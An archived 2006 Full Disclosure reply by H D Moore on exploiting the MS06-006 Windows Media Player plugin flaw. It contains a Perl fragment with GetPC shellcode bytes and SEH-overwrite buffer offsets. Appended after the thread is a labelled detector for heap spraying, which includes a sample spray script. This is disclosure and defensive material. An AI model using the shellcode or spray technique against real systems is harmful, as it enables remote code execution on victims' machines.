Full Disclosure mailing list archives

Re: MS06-0[0]6 Windows Media Player Exploitation [CODE]
From: H D Moore <fdlist () digitaloffense net>
Date: Fri, 17 Feb 2006 08:20:28 -0600

On Friday 17 February 2006 02:05, Matthew Murphy wrote:
> Interesting issue with regards to the module-list pointers.
> [ snip ]
>
> The heap spray technique works very effectively -- you end up with a
> *sizable* pad in the 0x04a00000 region which you can use as a direct
> jump point for the payload, without any of the fancy frame manipulation
> tricks that I am too tired to try at this hour of the night/morning.

Nice :-)

> This should also be (theoretically) version-independent.  Thanks to the
> similarities of the heap management APIs and the fact that most DLLs
> from MS use high bases, I'd bet money that this works across WMP
> versions on anything from NT 4.0 to 2003.

I ran into problems with Skylined's alphanumeric GetPC code - on Windows
XP SP2, the SEH GetPC doesn't work from inside another SEH handler (our
shellcode is one, since we smash SEH on the way down). Did some fancy
8086 instructions to get around this (thanks vlad902 - the human
assembler), so, fwiw:

my $getpc = 
"\x58\x58\x58". # pop eax, pop eax, pop eax
"\x05\x18\x29\x29\x29". # add eax,0x29292917
"\x2d\x01\x29\x29\x29". # sub eax,0x29292901
"\x50\x59"; # push eax, pop ecx

substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr] 
substr($pattern, 2086, 4, pack('V', $addr));
substr($pattern, 2090, length($getpc), $getpc);
substr($pattern, 2090 + length($getpc), length($shellcode), $shellcode);

> It's likely, as well, that this one technique works on any
> script-enabled browser that supports the plugin with the same results.

I tested my code across Opera/Firefox on 2000/XP/2003 - when I get some 
more time I will play with the heap spray method and see if that works 
cross-browser/os/version as well. Looks like heap spray is the way to go, 
at least for Firefox...

> 'Nuff teasing.  Code attached.  It is important to note that you should
> read the inline disclaimer *BEFORE* using the code.

Thanks for sharing!
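A defender-side example added here, not part of the thread and not Moore's or Murphy's code: the heap-spray shape discussed above (a short payload string, a pad grown by self-concatenation to a large size, then duplicated into an array in a loop) is distinctive enough in script source to flag with a few heuristics. The scanner below runs over two constructed script samples; the regexes, thresholds and sample scripts are all assumptions for illustration, and the byte-count arithmetic assumes `%uXXXX` escapes (two bytes per six characters).

```python
import re

# Constructed sample inputs (not from the page). The second has the spray
# shape described in the thread: a payload string, a pad doubled up to a
# large size, and many copies of pad+payload stored in an array.
BENIGN_SCRIPT = """
var names = ["alice", "bob"];
for (var i = 0; i < names.length; i++) {
    document.getElementById("out").innerHTML += names[i] + "<br>";
}
"""

SPRAY_SCRIPT = """
var sc = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
var pad = unescape("%u0a0a%u0a0a");
while (pad.length < 0x100000) pad += pad;
var blocks = new Array();
for (var i = 0; i < 400; i++) blocks[i] = pad + sc;
"""

# A run of at least eight %uXXXX escapes inside an unescape() call.
UNESCAPE_RUN = re.compile(r'unescape\(\s*["\']((?:%u[0-9a-fA-F]{4}){8,})["\']')
# "while (x.length < N) x += x" : a string doubling itself up to a target size.
DOUBLING_LOOP = re.compile(
    r'while\s*\(\s*(\w+)\.length\s*<\s*(0x[0-9a-fA-F]+|\d+)\s*\)\s*\1\s*\+=\s*\1')
# A for-loop whose body immediately assigns into an indexed array slot.
ARRAY_FILL = re.compile(r'for\s*\([^)]*\)\s*\w+\s*\[\s*\w+\s*\]\s*=')

# Hypothetical threshold: pads smaller than this are not treated as a spray.
MIN_PAD_BYTES = 0x10000


def _to_int(literal):
    """Parse a JavaScript numeric literal in hex or decimal form."""
    return int(literal, 16) if literal.lower().startswith("0x") else int(literal)


def heap_spray_indicators(script):
    """Collect the raw indicators; each value is a count or size, never a verdict."""
    runs = UNESCAPE_RUN.findall(script)
    doubling = DOUBLING_LOOP.search(script)
    return {
        "unescape_runs": len(runs),
        # Each %uXXXX escape is six characters and decodes to two bytes.
        "max_run_bytes": max((len(r) // 6 * 2 for r in runs), default=0),
        "doubling_target": _to_int(doubling.group(2)) if doubling else 0,
        "array_fill_loops": len(ARRAY_FILL.findall(script)),
    }


def scan(script):
    """Return (flagged, indicators). Flag only when a large self-doubling pad
    is combined with either an escaped payload or an array-fill loop, so a
    single indicator on its own does not trip the check."""
    ind = heap_spray_indicators(script)
    big_pad = ind["doubling_target"] >= MIN_PAD_BYTES
    payload_or_fill = ind["unescape_runs"] > 0 or ind["array_fill_loops"] > 0
    return big_pad and payload_or_fill, ind


if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SCRIPT), ("spray", SPRAY_SCRIPT)):
        flagged, ind = scan(src)
        print(label, "flagged" if flagged else "clean", ind)
```

The combination rule matters more than any single regex: a doubling loop alone also appears in legitimate string-building code, and `unescape` alone is common in old pages, so the scanner requires the pad-growth pattern plus one of the other two before flagging. In a real deployment the thresholds would be tuned against the traffic you actually see, and the verdict would feed a review queue rather than block on its own.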

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
